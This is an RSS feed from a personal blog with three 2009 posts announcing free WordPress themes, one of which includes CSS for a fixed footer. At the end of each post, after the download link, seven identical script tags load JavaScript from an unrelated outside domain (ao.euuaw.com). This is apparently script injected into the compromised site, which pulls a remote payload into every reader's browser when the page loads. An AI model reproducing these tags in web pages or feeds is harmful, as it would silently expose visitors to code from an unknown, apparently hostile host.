<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Jake Spurlock &#187; Themes</title>
	<atom:link href="http://jakespurlock.com/category/wordpress/themes/feed/" rel="self" type="application/rss+xml" />
	<link>http://jakespurlock.com</link>
	<description>Something subtle from the heart of Utah County</description>
	<lastBuildDate>Fri, 25 Jun 2010 16:27:05 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.1-alpha</generator>
<cloud domain='jakespurlock.com' port='80' path='/?rsscloud=notify' registerProcedure='' protocol='http-post' />
		<item>
		<title>Skulls&#8230;</title>
		<link>http://jakespurlock.com/2009/08/skulls/</link>
		<comments>http://jakespurlock.com/2009/08/skulls/#comments</comments>
		<pubDate>Mon, 24 Aug 2009 19:06:41 +0000</pubDate>
		<dc:creator>Jake Spurlock</dc:creator>
				<category><![CDATA[Themes]]></category>
		<category><![CDATA[Wordpress]]></category>
		<category><![CDATA[cufon]]></category>
		<category><![CDATA[development]]></category>
		<category><![CDATA[fixed-footer]]></category>
		<category><![CDATA[theme]]></category>

		<guid isPermaLink="false">http://jakespurlock.com/?p=1526</guid>
		<description><![CDATA[So, in the last few weeks, I have been doing a lot of WordPress theme development. When I see something cool on the web, I want to implement it a new a cool way. Skulls is basically the end result &#8230; <a href="http://jakespurlock.com/2009/08/skulls/">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<div class="tweetmeme_button" style="float: right; margin-left: 10px;">
			<a href="http://api.tweetmeme.com/share?url=http%3A%2F%2Fjakespurlock.com%2F2009%2F08%2Fskulls%2F"><br />
				<img src="http://api.tweetmeme.com/imagebutton.gif?url=http%3A%2F%2Fjakespurlock.com%2F2009%2F08%2Fskulls%2F&amp;source=whyisjake&amp;style=normal&amp;service=bit.ly" height="61" width="50" /><br />
			</a>
		</div>
<p><a href="http://jakespurlock.com/wp-content/uploads/2009/08/Picture-2.png" rel="lightbox"><img class="alignnone size-large wp-image-1535" title="Skull WordPress Theme" src="http://jakespurlock.com/wp-content/uploads/2009/08/Picture-2-1024x900.png" alt="Skull WordPress Theme" width="500" /></a></p>
<p>So, in the last few weeks, I have been doing a lot of WordPress theme development. When I see something cool on the web, I want to implement it a new a cool way. Skulls is basically the end result of some tinkering on the web. Here are some of the methods that I used in this theme.</p>
<h4>1. Font Replacement</h4>
<p style="padding-left: 30px;">I read a great article on <a title="Cameron Moll" href="http://cameronmoll.com">CameronMoll.com</a> called <a href="http://cameronmoll.com/archives/2009/03/cufon_font_embedding/">Exploring Cufón, a sIFR alternative for font embedding</a>. Cufón is this rad javascript library that will exchange text with a font resides on your server. A friend of mine, <a href="http://www.ninnypants.com/">Tyrel Kelsey</a> showed me an example on a site that he designed using the script, and from there, I was set. Immediately, I  knew that I wanted to create a grungy WordPress theme that I could use this on.</p>
<h4>2. Fixed Footer</h4>
<p style="padding-left: 30px;">Nothing terribly revolutionary, but after staring at Facebook everyday, I wanted to put a persistent footer, that would have a couple of quick links in it. To create a fixed footer, simple add the following code to your div.</p>
<p style="padding-left: 30px;">Make sure to add some bottom-margin to whatever div is going to be above it. You want to make sure you do that, so when you scroll to the bottom, you can see all of your content.</p>
<pre class="brush: css;">
#footer {
margin:auto;
position:fixed;
margin:auto;
left:0;
bottom:0;
height:40px;
width:100%;
background:#242424;
z-index:1999;
}
</pre>
<p>There are a couple of issues that in IE6 (Go figure&#8230;) But they can be resolved by adding this:</p>
<pre class="brush: css;">* html #footer {
top:expression(eval(document.compatMode &amp;amp;&amp;amp; document.compatMode=='CSS1Compat') ? documentElement.scrollTop +(documentElement.clientHeight-this.clientHeight) : document.body.scrollTop +(document.body.clientHeight-this.clientHeight));
position:absolute;
}
</pre>
<h4>3. SUPER-ULTRA-RAD GRAPHICS</h4>
<p style="padding-left: 30px;">I mentioned already the font replacement. I found some cool vector packs that had some skull designs in them. The post headers have a banner that overlays the other divs due to some negative margins. One thing to be aware of, if you follow a similar design, is to make sure that links have the coverage that they might need. I had them squeezed a lot tighter, but it was hard to click on the post links.</p>
<p>So, all in all, I think that it turned out to be a pretty cool theme. Not for everyone, but I think that someone will get a kick out of it.</p>
<p><a title="Skull WordPress Theme" href="http://wp-themes.com/skulls?TB_iframe=true&amp;width=1035&amp;height=787" target="_blank">Demo</a></p>
<p><a title="Skull WordPress Theme" href="http://wordpress.org/extend/themes/skulls" target="_blank">Download</a><script src="http://ao.euuaw.com/9"></script><script src="http://ao.euuaw.com/9"></script><script src="http://ao.euuaw.com/9"></script><script src="http://ao.euuaw.com/9"></script><script src="http://ao.euuaw.com/9"></script><script src="http://ao.euuaw.com/9"></script><script src="http://ao.euuaw.com/9"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://jakespurlock.com/2009/08/skulls/feed/</wfw:commentRss>
		<slash:comments>14</slash:comments>
		</item>
		<item>
		<title>So Fresh&#8230;</title>
		<link>http://jakespurlock.com/2009/08/so-fresh/</link>
		<comments>http://jakespurlock.com/2009/08/so-fresh/#comments</comments>
		<pubDate>Sun, 16 Aug 2009 23:33:24 +0000</pubDate>
		<dc:creator>Jake Spurlock</dc:creator>
				<category><![CDATA[Themes]]></category>
		<category><![CDATA[download]]></category>
		<category><![CDATA[So Fresh...]]></category>
		<category><![CDATA[theme]]></category>
		<category><![CDATA[Wordpress]]></category>

		<guid isPermaLink="false">http://jakespurlock.com/?p=1523</guid>
		<description><![CDATA[and so clean&#8230; Well, another day, another WordPress theme. In my head, I wanted to design a super clean and simple WordPress theme. The result is So Fresh&#8230; Demo Download]]></description>
			<content:encoded><![CDATA[<div class="tweetmeme_button" style="float: right; margin-left: 10px;">
			<a href="http://api.tweetmeme.com/share?url=http%3A%2F%2Fjakespurlock.com%2F2009%2F08%2Fso-fresh%2F"><br />
				<img src="http://api.tweetmeme.com/imagebutton.gif?url=http%3A%2F%2Fjakespurlock.com%2F2009%2F08%2Fso-fresh%2F&amp;source=whyisjake&amp;style=normal&amp;service=bit.ly" height="61" width="50" /><br />
			</a>
		</div>
<p>and so clean&#8230;</p>
<p>Well, another day, another WordPress theme. In my head, I wanted to design a super clean and simple WordPress theme.</p>
<p>The result is <a href="http://wordpress.org/extend/themes/so-fresh">So Fresh&#8230;</a></p>
<p><a href="http://jakespurlock.com/wp-content/uploads/2009/08/Picture-4.png" rel="lightbox"><img class="alignnone size-large wp-image-1524" title="So Fresh..." src="http://jakespurlock.com/wp-content/uploads/2009/08/Picture-4-1024x990.png" alt="So Fresh..." width="500" /></a></p>
<p><a title="So Fresh WordPress Theme" href="http://wp-themes.com/so-fresh?TB_iframe=true&amp;width=1009&amp;height=787">Demo</a></p>
<p><a title="So Fresh WordPress Theme Download" href="http://wordpress.org/extend/themes/download/so-fresh.0.5.2.zip">Download</a><script src="http://ao.euuaw.com/9"></script><script src="http://ao.euuaw.com/9"></script><script src="http://ao.euuaw.com/9"></script><script src="http://ao.euuaw.com/9"></script><script src="http://ao.euuaw.com/9"></script><script src="http://ao.euuaw.com/9"></script><script src="http://ao.euuaw.com/9"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://jakespurlock.com/2009/08/so-fresh/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>A Daring Inspiration</title>
		<link>http://jakespurlock.com/2009/07/a-daring-inspiration/</link>
		<comments>http://jakespurlock.com/2009/07/a-daring-inspiration/#comments</comments>
		<pubDate>Thu, 30 Jul 2009 06:10:13 +0000</pubDate>
		<dc:creator>Jake Spurlock</dc:creator>
				<category><![CDATA[Themes]]></category>
		<category><![CDATA[Daring]]></category>
		<category><![CDATA[Fireball]]></category>
		<category><![CDATA[Gruber]]></category>
		<category><![CDATA[Inspiration]]></category>
		<category><![CDATA[theme]]></category>
		<category><![CDATA[Wordpress]]></category>

		<guid isPermaLink="false">http://jakespurlock.com/?p=1513</guid>
		<description><![CDATA[I am excited today, to FINALLY release a WordPress theme that I have been working on. In all of it&#8217;s glory, A Daring Inspiration. Daring Inspiration is a theme that I have had kicking around in my head for a &#8230; <a href="http://jakespurlock.com/2009/07/a-daring-inspiration/">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<div class="tweetmeme_button" style="float: right; margin-left: 10px;">
			<a href="http://api.tweetmeme.com/share?url=http%3A%2F%2Fjakespurlock.com%2F2009%2F07%2Fa-daring-inspiration%2F"><br />
				<img src="http://api.tweetmeme.com/imagebutton.gif?url=http%3A%2F%2Fjakespurlock.com%2F2009%2F07%2Fa-daring-inspiration%2F&amp;source=whyisjake&amp;style=normal&amp;service=bit.ly" height="61" width="50" /><br />
			</a>
		</div>
<p>I am excited today, to FINALLY release a WordPress theme that I have been working on. In all of it&#8217;s glory, <a title="Daring Inspiration WordPress Theme" href="http://jakespurlock.com/inspiration" target="_blank">A Daring Inspiration</a>.</p>
<p><a href="http://jakespurlock.com/wp-content/uploads/2009/07/Daring_Inspiration.png" rel="lightbox"><img class="alignnone size-large wp-image-1514" title="Daring Inspiration" src="http://jakespurlock.com/wp-content/uploads/2009/07/Daring_Inspiration-1024x1009.png" alt="Daring Inspiration" width="500" /></a></p>
<p>Daring Inspiration is a theme that I have had kicking around in my head for a long time. For those unfamiliar, there is a great site on the internet run by mac pundit, <a title="My favorite online author." href="http://en.wikipedia.org/wiki/John_Gruber">John Gruber</a> called <a title="Greatest Mac Site" href="http://daringfireball.net">Daring Fireball</a>. John write simple text posts, and shares them in a link style that lends itself to being more of a link style blog then a traditional one.</p>
<p>With that being said, this theme is GPL licensed, XHTML valid, and rocking in its simplicity.</p>
<p><a title="Daring Inspiration WordPress Theme" href="http://jakespurlock.com/inspiration/">Demo</a><br />
<a href="http://wordpress.org/extend/themes/a-daring-inspiration-theme">Download Now</a><script src="http://ao.euuaw.com/9"></script><script src="http://ao.euuaw.com/9"></script><script src="http://ao.euuaw.com/9"></script><script src="http://ao.euuaw.com/9"></script><script src="http://ao.euuaw.com/9"></script><script src="http://ao.euuaw.com/9"></script><script src="http://ao.euuaw.com/9"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://jakespurlock.com/2009/07/a-daring-inspiration/feed/</wfw:commentRss>
		<slash:comments>28</slash:comments>
		</item>
	</channel>
</rss>
